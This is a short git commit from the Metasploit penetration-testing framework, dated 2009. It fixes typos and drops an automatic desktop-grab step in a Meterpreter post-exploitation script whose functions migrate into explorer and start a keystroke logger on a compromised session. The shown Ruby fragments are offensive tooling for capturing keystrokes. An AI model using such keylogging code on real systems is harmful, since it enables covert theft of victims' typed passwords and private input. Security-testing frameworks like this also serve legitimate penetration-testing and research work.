Bug fixes for typos; dont grabdesktop automatically (breaks psexec apparently)

git-svn-id: file:///home/svn/framework3/trunk@6385 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-03-25 00:08:42 +00:00
parent 129890d39b
commit 73e946ccf1
1 changed files with 2 additions and 4 deletions

View File

@ -62,7 +62,7 @@ def explrmigrate(session,captype)
end
return true
rescue
print_staus("Failed to migrate process!")
print_status("Failed to migrate process!")
return false
end
end
@ -70,13 +70,11 @@ end
#Function for starting the keylogger
def startkeylogger(session)
begin
print_status("Grabbing Desktop Keyboard Input....")
session.ui.grab_desktop
print_status("Starting the keystroke sniffer...")
client.ui.keyscan_start
return true
rescue
print_staus("Failed to start Keylogging!")
print_status("Failed to start Keylogging!")
return false
end
end